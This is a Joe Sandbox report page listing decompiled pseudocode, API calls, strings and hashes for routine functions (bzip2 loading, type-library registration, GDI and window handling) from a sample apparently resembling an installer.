Uniqueness Score: -1.00%

Function 00459E48 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00459E48(intOrPtr __eax) {
				intOrPtr _t2;

				_push("BZ2_bzDecompressInit");
				_push(__eax);
				L00405AA4();
				 *0x4adf58 = __eax;
				_push("BZ2_bzDecompress");
				_push(__eax);
				L00405AA4();
				 *0x4adf5c = __eax;
				_push("BZ2_bzDecompressEnd");
				_push(__eax);
				L00405AA4();
				 *0x4adf60 = __eax;
				if( *0x4adf58 == 0 ||  *0x4adf5c == 0 ||  *0x4adf60 == 0) {
					_t2 = 0;
				} else {
					_t2 = 1;
				}
				if(_t2 == 0) {
					 *0x4adf58 = 0;
					 *0x4adf5c = 0;
					 *0x4adf60 = 0;
					return _t2;
				}
				return _t2;
			}

0x00459e4b
0x00459e50
0x00459e51
0x00459e56
0x00459e5b
0x00459e60
0x00459e61
0x00459e66
0x00459e6b
0x00459e70
0x00459e71
0x00459e76
0x00459e82
0x00459e96
0x00459e9a
0x00459e9a
0x00459e9a
0x00459e9e
0x00459ea2
0x00459eaa
0x00459eb2
0x00000000
0x00459eb2
0x00459eb9

APIs

6D2B5550.KERNEL32(00000000,BZ2_bzDecompressInit,?,00474242,00000000,0047426B), ref: 00459E51
6D2B5550.KERNEL32(00000000,BZ2_bzDecompress,00000000,BZ2_bzDecompressInit,?,00474242,00000000,0047426B), ref: 00459E61
6D2B5550.KERNEL32(00000000,BZ2_bzDecompressEnd,00000000,BZ2_bzDecompress,00000000,BZ2_bzDecompressInit,?,00474242,00000000,0047426B), ref: 00459E71

Strings

BZ2_bzDecompressEnd, xrefs: 00459E6B
BZ2_bzDecompress, xrefs: 00459E5B
BZ2_bzDecompressInit, xrefs: 00459E4B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 2242650566-212574377
Opcode ID: 40f318fdcff30416d5126557637415d196d6d86968bbbfddca675b61e97a5751
Instruction ID: de3c78418231d07227c2df39924708b0e76bef5e17ba46a416235b005087575f
Opcode Fuzzy Hash: 40f318fdcff30416d5126557637415d196d6d86968bbbfddca675b61e97a5751
Instruction Fuzzy Hash: 29F0A970E00680DEDB14DB269C867673B95A78A306F24953BB80796AE6D77C0849CE1C

Uniqueness

Uniqueness Score: -1.00%

Function 0044C5B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28
libraryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0044C5B0() {
				signed int _t1;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;

				if( *0x48d74c == 0) {
					_t4 = LoadLibraryA("oleacc.dll");
					_t5 = _t4;
					if(_t5 != 0) {
						_push("LresultFromObject");
						_push(_t5);
						L00405AA4();
						 *0x48d754 = _t4;
						_push("CreateStdAccessibleObject");
						_push(_t5);
						L00405AA4();
						 *0x48d758 = _t4;
						if( *0x48d754 != 0 &&  *0x48d758 != 0) {
							 *0x48d750 = 1;
						}
					}
					 *0x48d74c = 1;
				}
				_t1 =  *0x48d750; // 0x0
				asm("sbb eax, eax");
				return  ~( ~_t1);
			}

0x0044c5b8
0x0044c5bf
0x0044c5c4
0x0044c5c8
0x0044c5ca
0x0044c5cf
0x0044c5d0
0x0044c5d5
0x0044c5da
0x0044c5df
0x0044c5e0
0x0044c5e5
0x0044c5f1
0x0044c5fc
0x0044c5fc
0x0044c5f1
0x0044c606
0x0044c606
0x0044c610
0x0044c617
0x0044c61c

APIs

LoadLibraryA.KERNEL32(oleacc.dll,?,0044EE6D), ref: 0044C5BF
6D2B5550.KERNEL32(00000000,LresultFromObject,oleacc.dll,?,0044EE6D), ref: 0044C5D0
6D2B5550.KERNEL32(00000000,CreateStdAccessibleObject,00000000,LresultFromObject,oleacc.dll,?,0044EE6D), ref: 0044C5E0

Strings

CreateStdAccessibleObject, xrefs: 0044C5DA
oleacc.dll, xrefs: 0044C5BA
LresultFromObject, xrefs: 0044C5CA

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550$LibraryLoad
String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
API String ID: 1360445975-1050967733
Opcode ID: 7bb195af7243991796f6405f99921774bdea7b113344556df735dc371b6d1cad
Instruction ID: d7e0617def1aff07391bfe8eb1b4a1e120b5e21a6a7b584130ac087eefeb3c37
Opcode Fuzzy Hash: 7bb195af7243991796f6405f99921774bdea7b113344556df735dc371b6d1cad
Instruction Fuzzy Hash: 01F01270A433819AFB50EF65DCC571A37A4E700309F15693EA401A61D2C7BD9484CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B720 Relevance: 9.1, APIs: 6, Instructions: 113
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041B720(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				void* __edi;
				short _t45;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr* _t64;
				short* _t71;
				intOrPtr _t78;
				signed int _t80;
				void* _t82;
				intOrPtr _t84;
				short _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t94;
				intOrPtr _t95;

				_t92 = _t94;
				_t95 = _t94 + 0xffffffe8;
				_push(_t82);
				_v8 = __eax;
				_v12 = 0;
				_t45 =  *((intOrPtr*)(_v8 + 0x20));
				if(_t45 == 0) {
					_t87 = E0041B700( *((intOrPtr*)(_v8 + 0xe)));
				} else {
					_t78 = _v8;
					_t87 = _t45;
				}
				_t99 = _t87 - 2;
				if(_t87 <= 2) {
					return _v12;
				} else {
					_v20 = (_t87 - 1 << 2) + 8;
					_v16 = E00406A40(_v20, _t78, _t82, _t99);
					_push(_t92);
					_push(0x41b870);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t95;
					_t71 = _v16;
					E00402A64(_t71, _v20);
					 *((short*)(_t71 + 2)) = _t87;
					 *_t71 = 0x300;
					_v28 = GetFocus();
					_t59 = _v28;
					_push(_t59);
					L00406034();
					_v24 = _t59;
					_push(_t92);
					_push(0x41b844);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t95;
					_push(0x68);
					_t60 = _v24;
					_push(_t60);
					L00405D64();
					_t84 = _t60;
					if(_t87 != 0x10 || _t84 < 0x10) {
						_t89 = _t87 - 1;
						__eflags = _t89;
						if(_t89 >= 0) {
							_t90 = _t89 + 1;
							_t80 = 0;
							_t64 = _v8 + 0x2a;
							__eflags = _t64;
							do {
								 *((char*)(_t71 + 4 + _t80 * 4)) =  *_t64;
								 *((char*)(_t71 + 5 + _t80 * 4)) =  *((intOrPtr*)(_t64 - 1));
								 *((char*)(_t71 + 6 + _t80 * 4)) =  *((intOrPtr*)(_t64 - 2));
								 *((char*)(_t71 + 7 + _t80 * 4)) = 0;
								_t80 = _t80 + 1;
								_t64 = _t64 + 4;
								_t90 = _t90 - 1;
								__eflags = _t90;
							} while (_t90 != 0);
						}
					} else {
						_push(_t71 + 4);
						_push(8);
						_push(0);
						_push(_v24);
						L00405D8C();
						_push(_t71 + 0x24);
						_push(8);
						_push(_t84 - 8);
						_push(_v24);
						L00405D8C();
					}
					_pop( *[fs:0x0]);
					_push(E0041B84B);
					_push(_v24);
					_t62 = _v28;
					_push(_t62);
					L0040621C();
					return _t62;
				}
			}

0x0041b721
0x0041b723
0x0041b728
0x0041b729
0x0041b72e
0x0041b734
0x0041b739
0x0041b74e
0x0041b73b
0x0041b73b
0x0041b73e
0x0041b73e
0x0041b750
0x0041b753
0x0041b880
0x0041b759
0x0041b762
0x0041b76d
0x0041b772
0x0041b773
0x0041b778
0x0041b77b
0x0041b77e
0x0041b788
0x0041b78d
0x0041b791
0x0041b79b
0x0041b79e
0x0041b7a1
0x0041b7a2
0x0041b7a7
0x0041b7ac
0x0041b7ad
0x0041b7b2
0x0041b7b5
0x0041b7b8
0x0041b7ba
0x0041b7bd
0x0041b7be
0x0041b7c3
0x0041b7c8
0x0041b7f9
0x0041b7fa
0x0041b7fc
0x0041b7fe
0x0041b7ff
0x0041b804
0x0041b804
0x0041b807
0x0041b809
0x0041b810
0x0041b817
0x0041b81b
0x0041b820
0x0041b821
0x0041b824
0x0041b824
0x0041b824
0x0041b807
0x0041b7cf
0x0041b7d2
0x0041b7d3
0x0041b7d5
0x0041b7da
0x0041b7db
0x0041b7e9
0x0041b7ea
0x0041b7ed
0x0041b7f1
0x0041b7f2
0x0041b7f2
0x0041b827
0x0041b831
0x0041b839
0x0041b83a
0x0041b83d
0x0041b83e
0x0041b843
0x0041b843

APIs

GetFocus.USER32(00000000,0041B870,?,?,?,?), ref: 0041B796
740BAC50.USER32(?,00000000,0041B870,?,?,?,?), ref: 0041B7A2
740BAD70.GDI32(?,00000068,00000000,0041B844,?,?,00000000,0041B870,?,?,?,?), ref: 0041B7BE
740BAEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B844,?,?,00000000,0041B870,?,?,?,?), ref: 0041B7DB
740BAEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B844,?,?,00000000,0041B870), ref: 0041B7F2
740BB380.USER32(?,?,0041B84B,?,?), ref: 0041B83E

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B380Focus
String ID:
API String ID: 3891926489-0
Opcode ID: adcefa71c22cc9f59d01e386f407f5dc848c9fd22f961dcd14a09b7471c0dc6a
Instruction ID: d66ea0f20c641b87f3b3874b3933403b10177221f0b42d250ee1590d7b740873
Opcode Fuzzy Hash: adcefa71c22cc9f59d01e386f407f5dc848c9fd22f961dcd14a09b7471c0dc6a
Instruction Fuzzy Hash: 1741EB35A00158DFCB10EFA9C885AAFBBB8EF49704F1584BAE900E7351D3389D50CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004566E4 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004566E4(signed char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				int _t26;
				void* _t37;
				void* _t43;
				void* _t47;
				signed char _t57;
				intOrPtr _t67;
				void* _t77;

				_t74 = __esi;
				_t73 = __edi;
				_push(__esi);
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t57 = __eax;
				E00403870(_v8);
				_push(_t77);
				_push(0x45680b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77 + 0xfffffff8;
				E0042C8F0(_v8,  &_v12);
				E004035DC( &_v8, _v12);
				 *0x48df2c = 0;
				_t26 = E004036BC(_v8);
				0x48df30[MultiByteToWideChar(0, 0, E00403880(_v8), _t26, 0x48df30, 0xfff)] = 0;
				E00455FB0(0);
				E00456394(4, 0, 0x2004);
				E00455FB0(0);
				_t37 =  *0x49df30 - 1;
				if(_t37 == 0) {
					E00451C00("LoadTypeLib", _t57,  *0x49df34, __edi, __esi, __eflags);
				} else {
					_t43 = _t37 - 1;
					if(_t43 == 0) {
						_t44 =  *0x49df34;
						__eflags =  *0x49df34;
						_t58 = _t57 | 0x2000 | __eflags != 0x00000000;
						__eflags = _t57 | 0x2000 | __eflags != 0x00000000;
						if(__eflags != 0) {
							E00451C00("RegisterTypeLib", _t58, _t44, __edi, __esi, __eflags);
						}
					} else {
						_t47 = _t43 - 1;
						if(_t47 == 0) {
							E00451C00("ITypeLib::GetLibAttr", _t57,  *0x49df34, __edi, __esi, __eflags);
						} else {
							_t82 = _t47 == 1;
							if(_t47 == 1) {
								_t51 =  *0x49df34;
								__eflags =  *0x49df34;
								if(__eflags != 0) {
									L11:
									E00451C00("UnRegisterTypeLib", _t57, _t51, _t73, _t74, __eflags);
								} else {
									__eflags = _t57;
									if(__eflags == 0) {
										goto L11;
									}
								}
							} else {
								E00451AFC("HelperRegisterTypeLibrary: StatusCode invalid", _t57, __edi, __esi, _t82);
							}
						}
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00456812);
				return E00403568( &_v12, 2);
			}

0x004566e4
0x004566e4
0x004566eb
0x004566ec
0x004566ef
0x004566f2
0x004566f5
0x004566fa
0x00456701
0x00456702
0x00456707
0x0045670a
0x00456713
0x0045671e
0x00456727
0x00456739
0x00456751
0x0045675d
0x0045676c
0x00456773
0x0045677d
0x0045677e
0x00456796
0x00456780
0x00456780
0x00456781
0x0045679d
0x004567a2
0x004567a7
0x004567a7
0x004567a9
0x004567b2
0x004567b2
0x00456783
0x00456783
0x00456784
0x004567c4
0x00456786
0x00456786
0x00456787
0x004567cb
0x004567d0
0x004567d2
0x004567d8
0x004567df
0x004567d4
0x004567d4
0x004567d6
0x00000000
0x00000000
0x004567d6
0x00456789
0x004567eb
0x004567eb
0x00456787
0x00456784
0x00456781
0x004567f2
0x004567f5
0x004567f8
0x0045680a

APIs

Part of subcall function 0042C8F0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C914

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,0048DF30,00000FFF,00000000,0045680B,?,?,00000000,0048D628), ref: 0045674C

Part of subcall function 00455FB0: CloseHandle.KERNEL32(00000000), ref: 00455FE0
Part of subcall function 00455FB0: WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045600A
Part of subcall function 00455FB0: GetExitCodeProcess.KERNEL32 ref: 0045601A
Part of subcall function 00455FB0: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 00456060
Part of subcall function 00455FB0: Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 00456079

Part of subcall function 00455FB0: TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 00455FFD

Strings

ITypeLib::GetLibAttr, xrefs: 004567BF
RegisterTypeLib, xrefs: 004567AD
LoadTypeLib, xrefs: 00456791
HelperRegisterTypeLibrary: StatusCode invalid, xrefs: 004567E6
UnRegisterTypeLib, xrefs: 004567DA

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseHandleProcess$ByteCharCodeExitFullMultiNameObjectPathSingleSleepTerminateWaitWide
String ID: HelperRegisterTypeLibrary: StatusCode invalid$ITypeLib::GetLibAttr$LoadTypeLib$RegisterTypeLib$UnRegisterTypeLib
API String ID: 3965036325-83444288
Opcode ID: d33c1ec6489238e1d7bb0c5ffb408920347aa90a3fe0abd086959489d3fb1748
Instruction ID: d00a5a7ab2be7f5786be0de2e48ebd106f020e902f67aa1599d3ace806d12d59
Opcode Fuzzy Hash: d33c1ec6489238e1d7bb0c5ffb408920347aa90a3fe0abd086959489d3fb1748
Instruction Fuzzy Hash: 8731C330711104ABDB10FB69C942A1FB7A8EB0834AF92443BBC04D73A7EA3CDD08965D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BFA4 Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041BFA4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v30;
				int _v40;
				int _v44;
				signed short _v48;
				int _t28;
				signed int _t29;
				signed short _t30;
				signed int _t31;
				signed short _t35;
				intOrPtr _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				intOrPtr _t55;

				_t53 = _t54;
				_t55 = _t54 + 0xffffff8c;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v24 = _v16 << 4;
				_v20 = E00406A40(_v24, __edx, __edi, __eflags);
				 *[fs:0x0] = _t55;
				 *((intOrPtr*)( *_v8))( *[fs:0x0], 0x41c250, _t53, __edi, __esi, __ebx, _t52);
				_v44 = GetSystemMetrics(0xb);
				_t28 = GetSystemMetrics(0xc);
				_v40 = _t28;
				_push(0);
				L00406034();
				_v48 = _t28;
				if(_v48 == 0) {
					E0041B5AC();
				}
				_push(_t53);
				_push(0x41c074);
				_push( *[fs:edx]);
				 *[fs:edx] = _t55;
				_push(0xe);
				_t29 = _v48;
				_push(_t29);
				L00405D64();
				_push(0xc);
				_t30 = _v48;
				_push(_t30);
				L00405D64();
				_t31 = _t29 * _t30;
				if(_t31 != 0x18) {
					__eflags = 1;
					_v30 = 1 << _t31;
				} else {
					_v30 = 0;
				}
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E0041C07B);
				_t35 = _v48;
				_push(_t35);
				_push(0);
				L0040621C();
				return _t35;
			}

0x0041bfa5
0x0041bfa7
0x0041bfad
0x0041bfb0
0x0041bfb3
0x0041bfbc
0x0041bfc7
0x0041bfd7
0x0041bfe9
0x0041bff2
0x0041bff7
0x0041bffc
0x0041bfff
0x0041c001
0x0041c006
0x0041c00d
0x0041c00f
0x0041c00f
0x0041c016
0x0041c017
0x0041c01c
0x0041c01f
0x0041c022
0x0041c024
0x0041c027
0x0041c028
0x0041c02f
0x0041c031
0x0041c034
0x0041c035
0x0041c03e
0x0041c044
0x0041c054
0x0041c057
0x0041c046
0x0041c046
0x0041c046
0x0041c05d
0x0041c060
0x0041c063
0x0041c068
0x0041c06b
0x0041c06c
0x0041c06e
0x0041c073

APIs

GetSystemMetrics.USER32 ref: 0041BFED
GetSystemMetrics.USER32 ref: 0041BFF7
740BAC50.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041C001
740BAD70.GDI32(00000000,0000000E,00000000,0041C074,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041C028
740BAD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041C074,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041C035
740BB380.USER32(00000000,00000000,0041C07B,0000000E,00000000,0041C074,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041C06E

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MetricsSystem$B380
String ID:
API String ID: 3145338429-0
Opcode ID: 300aa94ef2a80990f9c4a67f91d5527d06e1effc3134014cc00f28425edd26f3
Instruction ID: 61352310958d2d1372ad27983811079a8e6a1b4bff1fd1972ab6cd8891b72e8a
Opcode Fuzzy Hash: 300aa94ef2a80990f9c4a67f91d5527d06e1effc3134014cc00f28425edd26f3
Instruction Fuzzy Hash: 7E215E74E40608EFEB10EFE9C881BEEBBB4EB48704F10802AE515B7681D6795941CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401A98 Relevance: 9.1, APIs: 6, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00401A98() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t18;
				intOrPtr _t22;
				intOrPtr _t24;

				_t22 = _t24;
				if( *0x48d419 == 0) {
					return _t2;
				} else {
					_push(_t22);
					_push(E00401B70);
					_push( *[fs:edx]);
					 *[fs:edx] = _t24;
					if( *0x48d036 != 0) {
						_push(0x48d420);
						L00401330();
					}
					 *0x48d419 = 0;
					_t3 =  *0x48d478; // 0x5ff888
					LocalFree(_t3);
					 *0x48d478 = 0;
					_t18 =  *0x48d440; // 0x60241c
					while(_t18 != 0x48d440) {
						VirtualFree( *(_t18 + 8), 0, 0x8000);
						_t18 =  *_t18;
					}
					E00401398(0x48d440);
					E00401398(0x48d450);
					E00401398(0x48d47c);
					_t14 =  *0x48d438; // 0x601de8
					while(_t14 != 0) {
						 *0x48d438 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x48d438; // 0x601de8
					}
					_pop( *[fs:0x0]);
					_push(0x401b77);
					if( *0x48d036 != 0) {
						_push(0x48d420);
						L00401338();
					}
					_push(0x48d420);
					L00401340();
					return _t14;
				}
			}

0x00401a99
0x00401aa3
0x00401b79
0x00401aa9
0x00401aab
0x00401aac
0x00401ab1
0x00401ab4
0x00401abe
0x00401ac0
0x00401ac5
0x00401ac5
0x00401aca
0x00401ad1
0x00401ad7
0x00401ade
0x00401ae3
0x00401afd
0x00401af6
0x00401afb
0x00401afb
0x00401b0a
0x00401b14
0x00401b1e
0x00401b23
0x00401b2a
0x00401b2e
0x00401b35
0x00401b3a
0x00401b3f
0x00401b43
0x00401b4d
0x00401b59
0x00401b5b
0x00401b60
0x00401b60
0x00401b65
0x00401b6a
0x00401b6f
0x00401b6f

APIs

RtlEnterCriticalSection.KERNEL32(0048D420,00000000,00401B70), ref: 00401AC5
LocalFree.KERNEL32(005FF888,00000000,00401B70), ref: 00401AD7
VirtualFree.KERNEL32(?,00000000,00008000,005FF888,00000000,00401B70), ref: 00401AF6
LocalFree.KERNEL32(00601DE8,?,00000000,00008000,005FF888,00000000,00401B70), ref: 00401B35
RtlLeaveCriticalSection.KERNEL32(0048D420,00401B77), ref: 00401B60
RtlDeleteCriticalSection.KERNEL32(0048D420,00401B77), ref: 00401B6A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 68d932db4689e114aee9658c5227d6ca8a691041475f589188673913b12cc760
Instruction ID: 954f68671e0f677be55c5b6586aae97ede79eb7a3530a01ec67f03a117e7fc77
Opcode Fuzzy Hash: 68d932db4689e114aee9658c5227d6ca8a691041475f589188673913b12cc760
Instruction Fuzzy Hash: 0011BF70E022445BE715AB699C86F1E37A5A786B0CF44487BF40067AF2D77CB880C76D

Uniqueness

Uniqueness Score: -1.00%

Function 00473350 Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00473350(void* __eax) {
				intOrPtr _t12;
				signed int _t15;
				intOrPtr _t16;
				intOrPtr _t19;
				signed int _t21;
				long _t22;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				void* _t32;

				_t32 = __eax;
				_t12 =  *0x48d628; // 0x21d2410
				_t15 = GetWindowLongA( *(_t12 + 0x20), 0xffffffec) & 0xffffff00 | (_t14 & 0x00000080) == 0x00000000;
				if(_t32 != _t15) {
					_t16 =  *0x48d628; // 0x21d2410
					SetWindowPos( *(_t16 + 0x20), 0, 0, 0, 0, 0, 0x97);
					_t19 =  *0x48d628; // 0x21d2410
					_t21 = GetWindowLongA( *(_t19 + 0x20), 0xffffffec);
					if(_t32 == 0) {
						_t22 = _t21 | 0x00000080;
					} else {
						_t22 = _t21 & 0xffffff7f;
					}
					_t23 =  *0x48d628; // 0x21d2410
					SetWindowLongA( *(_t23 + 0x20), 0xffffffec, _t22);
					if(_t32 == 0) {
						_t26 =  *0x48d628; // 0x21d2410
						return SetWindowPos( *(_t26 + 0x20), 0, 0, 0, 0, 0, 0x57);
					} else {
						_t29 =  *0x48d628; // 0x21d2410
						return ShowWindow( *(_t29 + 0x20), 5);
					}
				}
				return _t15;
			}

0x00473351
0x00473355
0x00473365
0x0047336a
0x0047337b
0x00473384
0x0047338b
0x00473394
0x0047339b
0x004733a4
0x0047339d
0x0047339d
0x0047339d
0x004733ac
0x004733b5
0x004733bc
0x004733dc
0x00000000
0x004733be
0x004733c0
0x00000000
0x004733c9
0x004733bc
0x004733eb

APIs

GetWindowLongA.USER32 ref: 0047335E
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,004659C1), ref: 00473384
GetWindowLongA.USER32 ref: 00473394
SetWindowLongA.USER32 ref: 004733B5
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 004733C9
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 004733E5

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: f17edac987bd9c2908a07fa4262eb0fc9c87948dbfb0172ae07a896ab9d904bb
Instruction ID: 2bcae36e274d7689c46ab5f9e90a50334b90f60466ff99c51d2f902ba0d341bd
Opcode Fuzzy Hash: f17edac987bd9c2908a07fa4262eb0fc9c87948dbfb0172ae07a896ab9d904bb
Instruction Fuzzy Hash: 200144B5B423149BE710EF68DD81F6637D86B0C331F064699B959EB3E2D639E8009B0C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B488 Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B488(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041A8F8( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041A8F8( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041A974( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041A270(E0041A8BC( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041A270(E0041A8BC( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x0041b489
0x0041b494
0x0041b4a6
0x0041b4b5
0x0041b4ef
0x0041b500
0x0041b4b7
0x0041b4c9
0x0041b4da
0x0041b4da

APIs

Part of subcall function 0041A8F8: CreateBrushIndirect.GDI32 ref: 0041A963

UnrealizeObject.GDI32(00000000), ref: 0041B494
SelectObject.GDI32(?,00000000), ref: 0041B4A6
SetBkColor.GDI32(?,00000000), ref: 0041B4C9
SetBkMode.GDI32(?,00000002), ref: 0041B4D4
